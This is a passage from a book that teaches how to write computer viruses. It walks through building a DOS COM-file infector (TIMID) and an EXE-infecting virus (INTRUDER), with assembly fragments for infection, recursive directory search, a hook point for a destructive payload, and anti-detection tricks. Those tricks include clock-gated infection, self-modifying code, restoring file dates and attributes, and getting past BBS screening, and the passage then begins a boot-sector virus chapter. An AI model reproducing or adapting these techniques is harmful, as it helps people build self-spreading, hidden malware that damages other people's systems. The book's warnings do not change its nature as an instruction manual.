relocate itself as it copies itself from program to program. The

jumps and calls relocate themselves automatically. Handling the

data is not as easy. A data reference like

mov bx,WORD PTR [HANDLE]

44 The Little Black Book of Computer Viruses

refers to an absolute offset in the program segment labeled HAN

DLE. We cannot just define a word in memory using an assembler

directive like

HANDLE DW 0

and then assemble the virus and run it. If we do that, it will work

right the first time. Once it has attached itself to a new program,

though, all the memory addresses will have changed, and the virus

will be in big trouble. It will either bomb out itself, or cause its host

program to bomb.

There are two ways to avoid catastrophe here. Firstly, one

could put all of the data together in one place, and write the program

to dynamically determine where the data is and store that value in

a register (e.g. si) to access it dynamically, like this:

mov bx,[si+HANDLE_OFS]

where HANDLE_OFS is the offset of the variable HANDLE from

the start of the data area.

Alternatively, we could put all of the data in a fixed location

in the code segment, provided we're sure that neither the virus nor

the host will ever occupy that space. The only safe place to do this

is at the very end of the segment, where the stack resides. Since the

Initial Host

(10 Kb)

Virus

Code

HANDLE

New Host

(12 Kb)

Virus

Code

HANDLE

Relative Code

Absolute Data

Infection

Figure 9: Absolute data address catastrophe.

Case Number One: A Simple COM File Infector 45

virus takes control of the CPU first when the COM file is executed,

it will control the stack also. Thus we can determine exactly what

the stack is doing, and stay out of its way. This is the method we

choose.

When the virus first gains control, the stack pointer, sp, is

set to FFFF Hex. If it calls a subroutine, the address directly after

the call is placed on the stack, in the bytes FFFF Hex and FFFE

Hex in the program's segment, and the stack pointer is decremented

by two, to FFFD Hex. When the CPU executes the return instruc

tion in the subroutine, it uses the two bytes stored by the call to

determine where to return to, and increments the stack pointer by

two. Likewise, executing a push instruction decrements the stack

by two bytes and stores the desired register at the location of the

stack pointer. The pop instruction reverses this process. The int

instruction requires five bytes of stack space, and this includes calls

to hardware interrupt handlers, which may be accessed at any time

in the program without warning, one on top of the other.

The data area for the virus can be located just below the

memory required for the stack. The exact amount of stack space

required is rather difficult to determine, but 80 bytes will be more

than sufficient. The data will go right below these 80 bytes, and in

this manner its location may be fixed. Onemust simply take account

of the space it takes up when determining the maximum size of a

COM file in the FILE_OK routine.

Of course, one cannot put initialized variables on the stack.

They must be stored with the program on disk. To store them near

the end of the program segment would require the virus to expand

the file size of every file to near the 64K limit. Such a drastic change

in file sizes would quickly tip the user off that his system has been

infected! Instead, initialized variables should be stored with the

executable virus code. This strategy will keep the number of bytes

which must be added to the host to a minimum. (Thus it is a

worthwhile antidetection measure.) The drawback is that such

variables must then be located dynamically by the virus at run time.

Fortunately, we have only one piece of data which must be

preinitialized, the string used by DOS in the search routine to

locate COM files, which we called simply ``COMFILE''. If you take

a look back to the search routine, you'll notice that we already took

46 The Little Black Book of Computer Viruses

the relocatability of this piece of data into account when we

retrieved it using the instructions

mov dx,WORD PTR [VIR_START]

add dx,OFFSET COMFILE OFFSET VIRUS

instead of simply

mov dx,OFFSET COMFILE

The Master Control Routine

Now we have all the tools to write the TIMID virus. All

that is necessary is a master control routine to pull everything

together. This master routine must:

1) Dynamically determine the location (offset) of the

virus in memory.

2) Call the search routine to find a new program to infect.

3) Infect the program located by the search routine, if it

found one.

4) Return control to the host program.

To determine the location of the virus in memory, we use

a simple trick. The first instruction in the master control routine

will look like this:

VIRUS:

COMFILE DB '*.COM',0

VIRUS_START:

call GET_START

GET_START:

sub WORD PTR [VIR_START],OFFSET GET_START OFFSET VIRUS

The call pushes the absolute address of GET_START onto the stack

at FFFC Hex (since this is the first instruction of the virus, and the

first instruction to use the stack). At that location, we overlay the

stack with a word variable called VIR_START. We then subtract

the difference in offsets between GET_START and the first byte of

the virus, labeled VIRUS. This simple programming trick gets the

Case Number One: A Simple COM File Infector 47

absolute offset of the first byte of the virus in the program segment,

and stores it in an easily accessible variable.

Next comes an important antidetection step: The master

control routine moves the DiskTransfer Area (DTA) to the data area

for the virus using DOS function 1A Hex,

mov dx,OFFSET DTA

mov ah,1AH

int 21H

This move is necessary because the search routine will modify data

in the DTA. When a COM file starts up, the DTA is set to a default

value of an offset of 80 H in the program segment. The problem is

that if the host program requires command line parameters, they

are stored for the program at this same location. If the DTA were

not changed temporarily while the virus was executing, the search

routine would overwrite any command line parameters before the

host program had a chance to access them. That would cause any

infected COM program which required a command line parameter

to bomb. The virus would execute just fine, and host programs that

required no parameters would run fine, but the user could spot

trouble with some programs. Temporarily moving the DTA elimi

nates this problem.

With the DTA moved, the main control routine can safely

call the search and copy routines:

call FIND_FILE ;try to find a file to infect

jnz EXIT_VIRUS ;jump if no file was found

call INFECT ;else infect the file

EXIT_VIRUS:

Finally, the master control routine must return control to the host

program. This involves three steps: Firstly, restore the DTA to its

initial value, offset 80H,

mov dx,80H

mov ah,1AH

int 21H

48 The Little Black Book of Computer Viruses

Next, move the first five bytes of the original host program from

the data area START_CODE where they are stored to the start of

the host program at 100H,

Finally, the virus must transfer control to the host program

at 100H. This requires a trick, since one cannot simply say ``jmp

100H'' because such a jump is relative, so that instruction won't be

jumping to 100H as soon as the virus moves to another file, and that

spells disaster. One instruction which does transfer control to an

absolute offset is the return from a call. Since we did a call right at

the start of the master control routine, and we haven't executed the

corresponding return yet, executing the ret instruction will both

transfer control to the host, and it will clear the stack. Of course,

the return address must be set to 100H to transfer control to the

host, and not somewhere else. That return address is just the word

at VIR_START. So, to transfer control to the host, we write

mov WORD PTR [VIR_START],100H

ret

Bingo, the host program takes over and runs as if the virus had never

been there.

As written, this master control routine is a little dangerous,

because it will make the virus completely invisible to the user when

he runs a program... so it could get away. It seems wise to tame the

beast a bit when we are just starting. So, after the call to INFECT,

let's just put a few extra lines in to display the name of the file which

the virus just infected:

call INFECT

mov dx,OFFSET FNAME ;dx points to FNAME

mov WORD PTR [HANDLE],24H ;'$' string terminator

mov ah,9 ;DOS string write fctn

int 21H

EXIT_VIRUS:

This uses DOS function 9 to print the string at FNAME, which is

the name of the file that was infected. Note that if someone wanted

to make a malicious monster out of this virus, the destructive code

could easily be put here, or after EXIT_VIRUS, depending on the

conditions under which destructive activity was desired. For exam

Case Number One: A Simple COM File Infector 49

ple, our hacker could write a routine called DESTROY, which

would wreak all kinds of havoc, and then code it in like this:

call INFECT

call DESTROY

EXIT_VIRUS:

if one wanted to do damage only after a successful infection took

place, or like this:

call INFECT

EXIT_VIRUS:

call DESTROY

if one wanted the damage to always take place, no matter what, or

like this:

call FIND_FILE

jnz DESTROY

call INFECT

EXIT_VIRUS:

if one wanted damage to occur only in the event that the virus could

not find a file to infect, etc., etc. I say this not to suggest that you

write such a routine---please don't---but just to show you how easy

it would be to control destructive behavior in a virus (or any other

program, for that matter).

The First Host

To compile and run the virus, it must be attached to a host

program. It cannot exist by itself. In writing the assembly language

code for this virus, we have to set everything up so the virus thinks

it's already attached to someCOM file. All that is needed is a simple

program that does nothing but exit to DOS. To return control to

DOS, a program executed DOS function 4C Hex. That just stops

the program from running, and DOS takes over. When function 4C

is executed, a return code is put in al by the program making the

call, where al=0 indicates successful completion of the program.

Any other value indicates some kind of error, as determined by the

50 The Little Black Book of Computer Viruses

program making the DOS call. So, the simplest COM program

would look like this:

mov ax,4C00H

int 21H

Since the virus will take over the first five bytes of a COM

file, and since you probably don't know how many bytes the above

two instructions will take up, let's put five NOP (no operation)

instructions at the start of the host program. These take up five bytes

which do nothing. Thus, the host program will look like this:

HOST:

nop

nop

nop

nop

nop

mov ax,4C00H

int 21H

We don't want to code it like that though! We code it to

look just like it would if the virus had infected it. Namely, the NOP's

will be stored at START CODE,

START_CODE:

nop

nop

nop

nop

nop

and the first five bytes of the host will consist of a jump to the virus

and the letters ``VI'':

HOST:

jmp NEAR VIRUS_START

db 'VI'

mov ax,4C00H

int 21H

There, that's it. The TIMID virus is listed in its entirety in Appendix

A, along with everything you need to compile it correctly.

Case Number One: A Simple COM File Infector 51

I realize that you might be overwhelmed with new ideas

and technical details at this point, and for me to call this virus

``simple'' might be discouraging. If so, don't lose heart. Study it

carefully. Go back over the text and piece together the various

functional elements, one by one. And if you feel confident, you

might try putting it in a subdirectory of its own on your machine

and giving it a whirl. If you do though, be careful! Proceed at your

own risk! It's not like any other computer program you've ever run!

52 The Little Black Book of Computer Viruses

Case Number Two:

A Sophisticated Executable Virus

The simple COM file infector which we just developed

might be good instruction on the basics of how to write a virus, but

it is severely limited. Since it only attacks COM files in the current

directory, it will have a hard time proliferating. In this chapter, we

will develop a more sophisticated virus that will overcome these

limitations. . . . a virus that can infect EXE files and jump directory

to directory and drive to drive. Such improvements make the virus

much more complex, and also much more dangerous. We started

with something simple and relatively innocuous in the last chapter.

You can't get into too much trouble with it. However, I don't want

to leave you with only children's toys. The virus we discuss in this

chapter, named INTRUDER, is no toy. It is very capable of finding

its way into computers all around the world, and deceiving a very

capable computer whiz.

The Structure of an EXE File

An EXE file is not as simple as a COM file. The EXE file

is designed to allow DOS to execute programs that require more

than 64 kilobytes of code, data and stack. When loading an EXE

file, DOS makes no a priori assumptions about the size of the file,

or what is code or data. All of this information is stored in the EXE

file itself, in the EXE Header at the beginning of the file. This

header has two parts to it, a fixedlength portion, and a variable

length table of pointers to segment references in the Load Module,

called the Relocation Pointer Table. Since any virus which attacks

EXE files must be able to manipulate the data in the EXE Header,

we'd better take some time to look at it. Figure 10 is a graphical

representation of an EXE file. The meaning of each byte in the

header is explained in Table 1.

When DOS loads the EXE, it uses the Relocation Pointer

Table to modify all segment references in the Load Module. After

that, the segment references in the image of the program loaded

into memory point to the correct memory location. Let's consider

an example (Figure 11): Imagine an EXE file with two segments.

The segment at the start of the load module contains a far call to

the second segment. In the load module, this call looks like this:

Address Assembly Language Machine Code

0000:0150 CALL FAR 0620:0980 9A 80 09 20 06

From this, one can infer that the start of the second segment is

6200H (= 620H x 10H) bytes from the start of the load module. The

Relocation Pointer Table

EXE File Header

EXE Load Module

Figure 10: The layout of an EXE file.

54 The Little Black Book of Computer Viruses

Relocatable Ptr Table

EXE Header

0000:0150

0620:0980

0000:0153

CALL FAR 0620:0980

Routine X

Load

Module

ON DISK

PSP

CALL FAR 2750:0980

Routine X

IN RAM

Executable

Machine

Code

2750:0980

2130:0150

2130:0000

DOS

Figure 11: An example of relocating code.

Case Number Two: A Sophisticated Executable Virus 55

Table 1: Structure of the EXE Header.

Offset Size Name Description

0 2 Signature These bytes are the characters M

and Z in every EXE file and iden

tify the file as an EXE file. If

they are anything else, DOS will

try to treat the file as a COM

file.

2 2 Last Page Size Actual number of bytes in the

final 512 byte page of the file

(see Page Count).

4 2 Page Count The number of 512 byte pages in

the file. The last page may only

be partially filled, with the

number of valid bytes specified in

Last Page Size. For example a file

of 2050 bytes would have Page Size

= 4 and Last Page Size = 2.

6 2 Reloc Table Entries The number of entries in the re

location pointer table

8 2 Header Paragraphs The size of the EXE file header

in 16 byte paragraphs, including

the Relocation table. The header

is always a multiple of 16 bytes

in length.

0AH 2 MINALLOC The minimum number of 16 byte

paragraphs of memory that the pro

gram requires to execute. This is

in addition to the image of the

program stored in the file. If

enough memory is not available,

DOS will return an error when it

tries to load the program.

0CH 2 MAXALLOC The maximum number of 16 byte

paragraphs to allocate to the pro

gram when it is executed. This is

normally set to FFFF Hex, except

for TSR's.

0EH 2 Initial ss This contains the initial value

of the stack segment relative to

the start of the code in the EXE

file, when the file is loaded.

This is modified dynamically by

DOS when the file is loaded, to

reflect the proper value to store

in the ss register.

10H 2 Initial sp The initial value to set sp to

when the program is executed.

12H 2 Checksum A word oriented checksum value

such that the sum of all words in

the file is FFFF Hex. If the file

is an odd number of bytes long,

the lost byte is treated as a

word with the high byte = 0.

Often this checksum is used for

nothing, and some compilers do

not even bother to set it proper

56 The Little Black Book of Computer Viruses

Offset Size Name Description

12H (Cont) properly. The INTRUDER virus

will not alter the checksum.

14H 2 Initial ip The initial value for the

instruction pointer, ip, when

the program is loaded.

16H 2 Initial cs Initial value of the code seg

ment relative to the start of

the code in the EXE file. This

is modified by DOS at load time.

18H 2 Relocation Tbl Offset Offset of the start of the

relocation table from the start

of the file, in bytes.

1AH 2 Overlay Number The resident, primary part of a

program always has this word set

to zero. Overlays will have dif

ferent values stored here.

Table 1: Structure of the EXE Header (continued).

Relocation Pointer Table would contain a vector 0000:0153 to point

to the segment reference (20 06) of this far call. When DOS loads

the program, it might load it starting at segment 2130H, because

DOS and some memory resident programs occupy locations below

this. So DOS would first load the Load Module into memory at

2130:0000. Then it would take the relocation pointer 0000:0153

and transform it into a pointer, 2130:0153 which points to the

segment in the far call in memory. DOS will then add 2130H to the

word in that location, resulting in the machine language code 9A

80 09 50 27, or CALL FAR 2750:0980 (See Figure 11).

Note that a COM program requires none of these calisthen

ics since it contains no segment references. Thus, DOS just has to

set the segment registers all to one value before passing control to

the program.

Infecting an EXE File

A virus that is going to infect an EXE file will have to

modify the EXE Header and the Relocation Pointer Table, as well

as adding its own code to the Load Module. This can be done in a

whole variety of ways, some of which require more work than

others. The INTRUDER virus will attach itself to the end of an EXE

program and gain control when the program first starts. This will

Case Number Two: A Sophisticated Executable Virus 57

require a routine similar to that in TIMID, which copies program

code from memory to a file on disk, and then adjusts the file.

INTRUDER will have its very own code, data and stack

segments. A universal EXE virus cannot make any assumptions

about how those segments are set up by the host program. It would

crash as soon as it finds a program where those assumptions are

violated. For example, if one were to use whatever stack the host

program was initialized with, the stack could end up right in the

middle of the virus code with the right host. (That memory would

have been free space before the virus had infected the program.) As

soon as the virus started making calls or pushing data onto the stack,

it would corrupt its own code and selfdestruct.

To set up segments for the virus, new initial segment values

for cs and ss must be placed in the EXE file header. Also, the old

initial segments must be stored somewhere in the virus, so it can

pass control back to the host program when it is finished executing.

We will have to put two pointers to these segment references in the

relocation pointer table, since they are relocatable references inside

the virus code segment.

Adding pointers to the relocation pointer table brings up

an important question. To add pointers to the relocation pointer

table, it may sometimes be necessary to expand that table's size.

Since the EXE Header must be a multiple of 16 bytes in size,

relocation pointers are allocated in blocks of four four byte pointers.

Thus, if we can keep the number of segment references down to

two, it will be necessary to expand the header only every other time.

On the other hand, the virus may choose not to infect the file, rather

than expanding the header. There are pros and cons for both

possibilities. On the one hand, a load module can be hundreds of

kilobytes long, and moving it is a time consuming chore that can

make it very obvious that something is going on that shouldn't be.

On the other hand, if the virus chooses not to move the load module,

then roughly half of all EXE files will be naturally immune to

infection. The INTRUDER virus will take the quiet and cautious

approach that does not infect every EXE. You might want to try the

other approach as an exercise, and move the load module only when

necessary, and only for relatively small files (pick a maximum size).

Suppose the main virus routine looks something like this:

58 The Little Black Book of Computer Viruses

VSEG SEGMENT

VIRUS:

mov ax,cs ;set ds=cs for virus

mov ds,ax

.

.

.

mov ax,SEG HOST_STACK ;restore host stack

cli

mov ss,ax

mov sp,OFFSET HOST_STACK

sti

jmp FAR PTR HOST ;go execute host

Then, to infect a new file, the copy routine must perform the

following steps:

1. Read the EXE Header in the host program.

2. Extend the size of the load module until it is an even

multiple of 16 bytes, so cs:0000 will be the first byte

of the virus.

3. Write the virus code currently executing to the end of

the EXE file being attacked.

4. Write the initial values of ss:sp, as stored in the EXE

Header, to the locations of SEG HOST_STACK and

OFFSET HOST_STACK on disk in the above code.

5. Write the initial value of cs:ip in the EXE Header to

the location of FAR PTR HOST on disk in the above

code.

6. Store Initial ss=SEG VSTACK, Initial sp=OFFSET

VSTACK, Initial cs=SEG VSEG, and Initial

ip=OFFSET VIRUS in the EXE header in place of the

old values.

7. Add two to the Relocation Table Entries in the EXE

header.

8. Add two relocation pointers at the end of the Reloca

tion Pointer Table in the EXE file on disk (the location

of these pointers is calculated from the header). The

first pointer must point to SEG HOST_STACK in the

instruction

Case Number Two: A Sophisticated Executable Virus 59

mov ax,HOST_STACK

The second should point to the segment part of the

jmp FAR PTR HOST

instruction in the main virus routine.

9. Recalculate the size of the infected EXE file, and

adjust the header fields Page Count and Last Page

Size accordingly.

10. Write the new EXE Header back out to disk.

All the initial segment values must be calculated from the size of

the load module which is being infected. The code to accomplish

this infection is in the routine INFECT in Appendix B.

A Persistent File Search Mechanism

As in the TIMID virus, the search mechanism can be

broken down into two parts: FIND_FILE simply locates possible

files to infect. FILE_OK, determines whether a file can be infected.

The FILE_OK procedure will be almost the same as the

one in TIMID. It must open the file in question and determine

whether it can be infected and make sure it has not already been

infected. The only two criteria for determining whether an EXE file

can be infected are whether the Overlay Number is zero, and

whether it has enough room in its relocation pointer table for two

more pointers. The latter requirement is determined by a simple

calculation from values stored in the EXE header. If

16*Header Paragraphs4*Relocation Table EntriesRelocation Table Offset

is greater than or equal to 8 (=4 times the number of relocatables

the virus requires), then there is enough room in the relocation

pointer table. This calculation is performed by the subroutine

REL_ROOM, which is called by FILE_OK.

To determine whether the virus has already infected a file,

we put an ID word with a preassigned value in the code segment

60 The Little Black Book of Computer Viruses

at a fixed offset (say 0). Then, when checking the file, FILE_OK

gets the segment from the Initial cs in the EXE header. It uses that

with the offset 0 to find the ID word in the load module (provided

the virus is there). If the virus has not already infected the file,

Initial cs will contain the initial code segment of the host program.

Then our calculation will fetch some random word out of the file

which probably won't match the ID word's required value. In this

way FILE_OK will know that the file has not been infected. So

FILE_OK stays fairly simple.

However, we want to design a much more sophisticated

FIND_FILE procedure than TIMID's. The procedure in TIMID

could only search for files in the current directory to attack. That

was fine for starters, but a good virus should be able to leap from

directory to directory, and even from drive to drive. Only in this

way does a virus stand a reasonable chance of infecting a significant

portion of the files on a system, and jumping from system to system.

To search more than one directory, we need a tree search

routine. That is a fairly common algorithm in programming. We

write a routine FIND_BR, which, given a directory, will search it

for an EXE which will pass FILE_OK. If it doesn't find a file, it

will proceed to search for subdirectories of the currently referenced

directory. For each subdirectory found, FIND_BR will recursively

call itself using the new subdirectory as the directory to perform a

search on. In this manner, all of the subdirectories of any given

directory may be searched for a file to infect. If one specifies the

directory to search as the root directory, then all files on a disk will

get searched.

Making the search too long and involved can be a problem

though. A large hard disk can easily contain a hundred subdirecto

ries and thousands of files. When the virus is new to the system it

will quickly find an uninfected file that it can attack, so the search

will be unnoticably fast. However, once most of the files on the

system are already infected, the virus might make the disk whirr

for twenty seconds while examining all of the EXE's on a given

drive to find one to infect. That could be a rather obvious clue that

something is wrong.

To minimize the search time, we must truncate the search

in such a way that the virus will still stand a reasonable chance of

Case Number Two: A Sophisticated Executable Virus 61

infecting every EXE file on the system. To do that we make use of

the typical PC user's habits. Normally, EXE's are spread pretty

evenly throughout different directories. Users often put frequently

used programs in their path, and execute them from different

directories. Thus, if our virus searches the current directory, and all

of its subdirectories, up to two levels deep, it will stand a good

chance of infecting a whole disk. As added insurance, it can also

search the root directory and all of its subdirectories up to one level

deep. Obviously, the virus will be able to migrate to different drives

and directories without searching them specifically, because it will

attack files on the current drive when an infected program is

executed, and the program to be executed need not be on the current

drive.

When coding the FIND_FILE routine, it is convenient to

structure it in three levels. First is a master routine FIND_FILE,

which decides which subdirectory branches to search. The second

level is a routine which will search a specified directory branch to

FIND_FILE

FINDBR

FINDEXE

FILE_OK

FIRSTDIR

NEXTDIR

SUBDIR1

(CURRENT)

SUBDIR2

SD11 SD12 SD21

SD111 SD112 SD121 SD211

SD1112 SD1113 SD2111 SD2112

ROOT DIR

Figure 12: Logic of the file search routines.

62 The Little Black Book of Computer Viruses

a specified level, FIND_BR. When FIND_BR is called, a directory

path is stored as a null terminated ASCII string in the variable

USEFILE, and the depth of the search is specified in LEVEL. At

the third level of the search algorithm, one routine searchs for EXE

files (FINDEXE) and two search for subdirectories (FIRSTDIR

and NEXTDIR). The routine that searches for EXE files will call

FILE_OK to determine whether each file it finds is infectable, and

it will stop everything when it finds a good file. The logic of this

searching sequence is illustrated in Figure 12. The code for these

routines is also listed in Appendix B.

AntiDetection Routines

A fairly simple antidetection tactic can make this virus

muchmore difficult for the human eye to locate: Simply don't allow

the search and copy routines to execute every time the virus gets

control. One easy way of doing that is to look at the system clock,

and see if the time in ticks (1 tick = 1/18.2 seconds) modulo some

number is zero. If it is, execute the search and copy routines,

otherwise just pass control to the host program. This antidetection

routine will look like this:

SHOULDRUN:

xor ah,ah ;read time using

int 1AH ;BIOS time of day service

and al,63

ret

This routine returns with z set roughly one out of 64 times. Since

programs are not normally executed in sync with the clock timer,

it will essentially return a z flag randomly. If called in the main

control routine like this:

call SHOULDRUN

jnz FINISH ;don't infect unless z set

call FIND_FILE

jnz FINISH ;don't infect without valid file

call INFECT

FINISH:

Case Number Two: A Sophisticated Executable Virus 63

the virus will attack a file only one out of every 64 times the host

program is called. Every other time, the virus will just pass control

to the host without doing anything. When it does that, it will be

completely invisible even to the most suspicious eye.

The SHOULDRUN routine would pose a problem if you

wanted to go and infect a system with it. You might have to sit there

and run the infected program 50 or 100 times to get the virus to

move to one new file on that system. That is annoying, and prob

lematic if you want to get it into a system with minimal risk.

Fortunately, a slight change can fix it. Just change SHOULDRUN

to look like this:

SHOULDRUN:

xor ah,ah

SR1: ret

int 1AH

and al,63

ret

and include another routine to modify the SHOULDRUN routine,

SETSR:

mov al,90H ;NOP instruction = 90H

mov BYTE PTR [SR1],al

ret

which can be incorporated into the main control routine like this:

call SHOULDRUN

jnz FINISH

call SETSR

call FIND_FILE

jnz FINISH

call INFECT

FINISH:

After SETSR has been executed, and before INFECT, the

SHOULDRUN routine becomes

SHOULDRUN:

xor ah,ah

SR1: nop

int 1AH

and al,63

ret

64 The Little Black Book of Computer Viruses

since the 90H which SETSR puts at SR1 is just a NOP instruction.

When INFECT copies the virus to a new file, it copies it with the

modified SHOULDRUN procedure. The result is that the first time

the virus is executed, it definitely searches for a file and infects it.

After that it goes to the 1outof64 infection scheme. In this way,

you can take the virus as assembled into the EXE, IN

TRUDER.EXE, and run it and be guaranteed to infect something.

After that, the virus will infect the system more slowly.

Another useful tactic that we do not employ here is to make

the first infection very rare, and then more frequent after that. This

might be useful in getting the virus through a BBS, where it is

carefully checked for infectious behavior, and if none is seen, it is

passed around. (That's a hypothetical situation only, please don't

do it!) In such a situation, no one person would be likely to spot the

virus by sitting down and playing with the program for a day or

two, even with a sophisticated virus checker handy. However, if a

lot of people were to pick up a popular and useful (infected)

program that they used daily, they could all end up infected and

spreading the virus eventually.

The tradeoff in restraining the virus to infect only every

one in N times is that it slows the infection rate down. What might

take a day with no restraints may take a week, a month, or even a

year, depending on how often the virus is allowed to reproduce.

There are no clear rules to determine what is best---a quickly

reproducing virus or one that carefully avoids being noticed---it all

depends on what you're trying to do with it.

Another important antidetection mechanism incorporated

into INTRUDER is that it saves the date and time of the file being

infected, along with its attribute. Then it changes the file attribute

to read/write, performs the modifications on the file, and restores

the original date, time and attribute. Thus, the infected EXE does

not have the date and time of the infection, but its original date and

time. The infection cannot be traced back to its source by studying

the dates of the infected files on the system. Also, since the original

attribute is restored, the archive bit never gets set, so the user who

performs incremental backups does not find all of his EXE's getting

backed up one day (a strange sight indeed). As an added bonus, the

virus can infect readonly and system files without a hitch.

Case Number Two: A Sophisticated Executable Virus 65

Passing Control to the Host

The final step the virus must take is to pass control to the

host program without dropping the ball. To do that, all the registers

should be set up the same as they would be if the host program were

being executed without the virus. We already discussed setting up

cs:ip and ss:sp. Except for these, only the ax register is set to a

specific value by DOS, to indicate the validity of the drive ID in the

FCB's in the PSP. If an invalid identifier (i.e. ``D:'', when a system

has no D drive) is in the first FCB at 005C, al is set to FF Hex, and

if the identifier is valid, al=0. Likewise, ah is set to FF if the

identifier in the FCB at 006C is invalid. As such, ax can simply be

saved when the virus starts and restored before it transfers control

to the host. The rest of the registers are not initialized by DOS, so

we need not be concerned with them.

Of course, the DTA must also be moved when the virus is

first fired up, and then restored when control is passed to the host.

Since the host may need to access parameters which are stored

there, moving the DTA temporarily is essential since it avoids

overwriting those parameters during the search operation.

WARNING

Unlike the TIMID virus, INTRUDER contains no notice

that it is infecting a file. It contains nothing but routines that will

help it reproduce. Although it is not intentionally destructive, it is

extremely infective and easy to overlook. . . and difficult to get rid

of once it gets started. Therefore, DO NOT RUN THIS VIRUS,

except in a very carefully controlled environment. The listing in

Appendix B contains the code for the virus. A locator program,

FINDINT, is also supplied, so if you do run the virus, you'll be able

to see which files have been infected by it.

66 The Little Black Book of Computer Viruses

Case Number Three:

A Simple Boot Sector Virus

The boot sector virus can be the simplest or the most

sophisticated of all computer viruses. On the one hand, the boot

sector is always located in a very specific place on disk. Therefore,

both the search and copy mechanisms can be extremely quick and

simple, if the virus can be contained wholly within the boot sector.

On the other hand, since the boot sector is the first code to gain

control after the ROM startup code, it is very difficult to stop before

it loads. If one writes a boot sector virus with sufficiently sophisti

cated antidetection routines, it can also be very difficult to detect

after it loads, making the virus nearly invincible. In the next two

chapters we will examine both extremes. This chapter will take a

look at one of the simplest of all boot sector viruses to learn the

basics of how they work. The following chapter will dig into the

details of a fairly sophisticated one.

Boot Sectors

To understand the operation of a boot sector virus one must

first understand how a normal, uninfected boot sector works. Since

the operation of a boot sector is hidden from the eyes of a casual

user, and often ignored by books on PC's, we will discuss them

here.

When a PC is first turned on, the CPU begins executing the

machine language code at the location F000:FFF0. The system

BIOS ROM (BasicInputOutputSystem ReadOnlyMemory) is

located in this high memory area, so it is the first code to be executed

by the computer. This ROM code is written in assembly language

and stored on chips (EPROMS) inside the computer. Typically this

code will perform several functions necessary to get the computer

up and running properly. First, it will check the hardware to see

what kinds of devices are a part of the computer (e.g., color or mono

monitor, number and type of disk drives) and it will see whether

these devices are working correctly. The most familiar part of this

startup code is the memory test, which cycles through all the

memory in the machine twice, displaying the addresses on the

screen. The startup code will also set up an interrupt table in the

lowest 1024 bytes of memory. This table provides essential entry

points (interrupt vectors) so all programs loaded later can access

the BIOS services. The BIOS startup code also initializes a data

area for the BIOS starting at the memory location 0040:0000H,

right above the interrupt vector table. Once these various house

keeping chores are done, the BIOS is ready to transfer control to

the operating system for the computer, which is stored on disk.

But which disk? Where on that disk? What does it look

like? How big is it? How should it be loaded and executed? If the

BIOS knew the answers to all of these questions, it would have to

be configured for one and only one operating system. That would

be a problem. As soon as a new operating system (like OS/2) or a

new version of an old familiar (like MSDOS 4.0) came out, your

computer would become obsolete! For example, a computer set up

with PCDOS 2.0 could not run MSDOS 3.3, or Xenix. Amachine

set up with CPM86 (an old, obsolete operating system) could run

none of the above. That wouldn't be a very pretty picture.

The boot sector provides a valuable intermediate step in

the process of loading the operating system. It works like this: the

BIOS remains ignorant of the operating system you wish to use.

However, it knows to first go out to floppy disk drive A: and attempt

to read the first sector on that disk (at Track 0, Head 0, Sector 1)

into memory at location 0000:7C00H. If the BIOS doesn't find a

disk in drive A:, it looks for the hard disk drive C:, and tries to load

68 The Little Black Book of Computer Viruses

its first sector. (And if it can't find a disk anywhere, it will either

go into ROM Basic or generate an error message, depending on

what kind of a computer it is.) Once the first sector (the boot sector)

has been read into memory, the BIOS checks the last two bytes to

see if they have the values 55H AAH. If so, the BIOS assumes it

has found a valid boot sector, and transfers control to it at

0000:7C00H. From this point on, it is the boot sector's responsibil

ity to load the operating system into memory and get it going,

whatever the operating system may be. In this way the BIOS (and

the computer manufacturer) avoids having to know anything about

what operating system will run on the computer. Each operating

system will have a unique disk format and its own configuration,

its own system files, etc. As long as every operating system puts a

boot sector in the first sector on the disk, it will be able to load and

run.

Since a sector is normally only 512 bytes long, the boot

sector must be a very small, rude program. Generally, it is designed

to load another larger file or group of sectors from disk and then

pass control to them. Where that larger file is depends on the

operating system. In the world of DOS, most of the operating

Loaded by BIOS

Loaded by the Boot sector

(RAM)

Figure 13: Loading the DOS operating system.

IBMBIO.COM

Boot Sector

ROM BIOS

0000:7C00

0000:0700

F000:0000

Case Number Three: A Simple Boot Sector Virus 69

system is kept in three files on disk. One is the familiar COM

MAND.COM and the other two are hidden files (hidden by setting

the ``hidden'' file attribute) which are tucked away on every DOS

boot disk. These hidden files must be the first two files on a disk in

order for the boot sector to work properly. If they are anywhere else,

DOS cannot be loaded from that disk. The names of these files

depend on whether you're using PCDOS (from IBM) or MSDOS

(from Microsoft). Under PCDOS, they're called IBMBIO.COM

and IBMDOS.COM. Under MSDOS they're called IO.SYS and

MSDOS.SYS.

When a normal DOS boot sector executes, it first deter

mines the important disk parameters for the particular disk it is

installed on. Next it checks to see if the two hidden operating system

files are on the disk. If they aren't, the boot sector displays an error

message and stops the machine. If they are there, the boot sector

tries to load the IBMBIO.COM or IO.SYS file into memory at

location 0000:0700H. If successful, it then passes control to that

program file, which continues the process of loading the PC/MS

DOS operating system. That's all the boot sector on a floppy disk

does.

A hard drive is a little more complex. It will contain two

(or more) boot sectors instead of just one. Since a hard drive can

be divided into more than one partition (an area on the disk for the

use of an operating system), it may contain several different oper

ating systems. When the BIOS loads the boot sector in the first

physical sector on the hard drive, it treats it just the same as a floppy

drive. However, the sector that gets loaded performs a completely

different function. Rather than loading an operating system's code,

this sector handles the partition information, which is also stored

in that sector (by the FDISK program in DOS). No matter how

many partitions a disk may have, one of them must be made active

(by setting a byte in the partition table) to boot off the hard disk.

The first boot sector determines which partition is active, moves

itself to a different place in memory, and then loads the first sector

in the active partition into memory (at 0000:7C00H), where the

partition boot sector originally was. The first sector in the active

partition is the operating system boot sector which loads the oper

70 The Little Black Book of Computer Viruses

ating system into memory. It is virtually identical to the boot sector

on floppy disk.

Designing a boot sector virus can be fairly simple---at least

in principle. All that such a virus must do is take over the first sector

on disk (or the first sector in the active partition of a hard disk, if it

prefers to go after that). From there, it tries to find uninfected disks

in the system. Problems arise when that virus becomes so compli

cated that it takes up too much room. Then the virus must become

two or more sectors long, and the author must find a place to hide

multiple sectors, load them, and copy them. This can be a messy

and difficult job. If a single sector of code could be written that

could both load the DOS operating system and copy itself to other

disks, one would have a very simple virus which would be practi

cally impossible for the unsuspecting user to detect. Such is the

virus we will discuss in this chapter. Its name is KILROY.

Rather than designing a virus that will infect a boot sector,

it is much easier to design a virus that simply is a selfreproducing

boot sector. That is because boot sectors are pretty cramped---there

Partition

Boot Sector

DOS

Boot Sector

DOS

Boot Sector

Operating

System

(IO.SYS)

Partition

Boot Sector

